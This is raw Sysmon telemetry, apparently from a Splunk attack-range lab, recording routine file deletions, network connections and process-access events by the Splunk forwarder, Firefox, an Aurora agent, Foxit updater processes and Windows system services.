23542300x800000000000000015024Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:36.867{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE3F47CEB9DAECE5FA8A5030252E6068,SHA256=A12628CDDB34A8242DA4468C81F8DC6739988DF70C47C85329EC218075A09655,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000039260Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:36.545{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=306A728D3D26CA9E06ED1E33D097FED3,SHA256=63B4DEBDE5E21DDA2F6D6F61417E1788F49D262134085687210D8285590A13AE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000039259Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:33.132{FE4C2B44-E1F1-63C7-9405-00000000AF02}352C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56209-false34.117.237.239239.237.117.34.bc.googleusercontent.com443https 23542300x800000000000000015026Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:37.963{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C72062EB147CD477A1D52B50BDABE603,SHA256=AE85C687F701DEB193A1724C14F08B340CF01ED1384B5FB22CD0C120E466BF2A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000039309Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:37.637{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82F3E1A54412FEC8573DA731C61E7F04,SHA256=E2553B6702B56A899B59CF43D1D8D8D82074A0444C9CFEE6A99CA5D7DEED4EAD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000039308Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:37.626{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000039307Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:37.626{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 23542300x800000000000000039306Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:37.605{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE8B8F350CDEC7DFB24F3098103A671F,SHA256=8F7CC2BB36AC6DBE3AC8F1F6E8327EB0327253308751D4B720E5A641C09347F7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 534500x800000000000000039305Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:37.572{FE4C2B44-E325-63C7-F705-00000000AF02}6408C:\Users\ADMINI~1\AppData\Local\Temp\is-VA6UU.tmp\CountInstallation.exe 354300x800000000000000015025Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:36.033{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50032-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000039304Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:37.544{FE4C2B44-E325-63C7-F805-00000000AF02}4560ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitUpdater.exeC:\ProgramData\Foxit Software\Foxit PDF Reader\FoxitSensor\Sensor.db-journalMD5=EF0129B3C545A4CD7B698E433D1F8D09,SHA256=02BAF19A4DB2E4A06170CD7A7CA206BBAA503346040E40578BA7F3AD4E873DB5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000039303Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:37.460{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E325-63C7-F805-00000000AF02}4560C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitUpdater.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\lsasrv.dll+26ae7|C:\Windows\system32\lsasrv.dll+27c55|C:\Windows\system32\lsasrv.dll+26965|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039302Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:37.460{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E325-63C7-F805-00000000AF02}4560C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitUpdater.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|C:\Windows\system32\lsasrv.dll+268ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039301Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:37.445{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E325-63C7-F805-00000000AF02}4560C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitUpdater.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000039300Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:37.445{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E325-63C7-F805-00000000AF02}4560C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitUpdater.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000039299Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:37.445{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E325-63C7-F805-00000000AF02}4560C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitUpdater.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 23542300x800000000000000039298Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:37.409{FE4C2B44-E325-63C7-F805-00000000AF02}4560ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitUpdater.exeC:\ProgramData\Foxit Software\Foxit PDF Reader\FoxitSensor\Sensor.db-journalMD5=7C6B6BC154BB430946EE8FB7451904FE,SHA256=5376B44DF0563BD96E3761840EC238A6BA0605698BF15D65231A35F91A81BF37,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000039297Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:37.398{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624792C:\Windows\system32\lsass.exe{FE4C2B44-E325-63C7-F805-00000000AF02}4560C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitUpdater.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x800000000000000039296Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:35.518{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56210-false10.0.1.12-8000- 23542300x800000000000000039295Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:37.362{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=8A08A55AEEF1BFB4B7EBAA918EAC675E,SHA256=1CC28EDA3A690723C012FF18675FEFA4967E8F186A85737111A3983102592E76,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000039294Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:37.305{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E325-63C7-F805-00000000AF02}4560C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitUpdater.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000039293Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:37.305{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E325-63C7-F805-00000000AF02}4560C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitUpdater.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000039292Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:37.305{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E325-63C7-F805-00000000AF02}4560C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitUpdater.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000039291Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:37.258{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E325-63C7-F705-00000000AF02}6408C:\Users\ADMINI~1\AppData\Local\Temp\is-VA6UU.tmp\CountInstallation.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000039290Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:37.258{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E325-63C7-F705-00000000AF02}6408C:\Users\ADMINI~1\AppData\Local\Temp\is-VA6UU.tmp\CountInstallation.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000039289Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:37.258{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E325-63C7-F705-00000000AF02}6408C:\Users\ADMINI~1\AppData\Local\Temp\is-VA6UU.tmp\CountInstallation.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000039288Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:37.236{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-E325-63C7-F805-00000000AF02}4560C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitUpdater.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039287Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:37.230{FE4C2B44-D9F5-63C7-1600-00000000AF02}12963348C:\Windows\system32\svchost.exe{FE4C2B44-E325-63C7-F805-00000000AF02}4560C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitUpdater.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039286Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:37.230{FE4C2B44-D9F5-63C7-1600-00000000AF02}12961340C:\Windows\system32\svchost.exe{FE4C2B44-E325-63C7-F805-00000000AF02}4560C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitUpdater.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039285Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:37.222{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E325-63C7-F705-00000000AF02}6408C:\Users\ADMINI~1\AppData\Local\Temp\is-VA6UU.tmp\CountInstallation.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000039284Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:37.222{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E325-63C7-F705-00000000AF02}6408C:\Users\ADMINI~1\AppData\Local\Temp\is-VA6UU.tmp\CountInstallation.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000039283Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:37.222{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E325-63C7-F705-00000000AF02}6408C:\Users\ADMINI~1\AppData\Local\Temp\is-VA6UU.tmp\CountInstallation.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000039282Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:37.209{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039281Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:37.194{FE4C2B44-DDF4-63C7-A004-00000000AF02}47002992C:\Windows\system32\csrss.exe{FE4C2B44-E325-63C7-F805-00000000AF02}4560C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitUpdater.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000039280Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 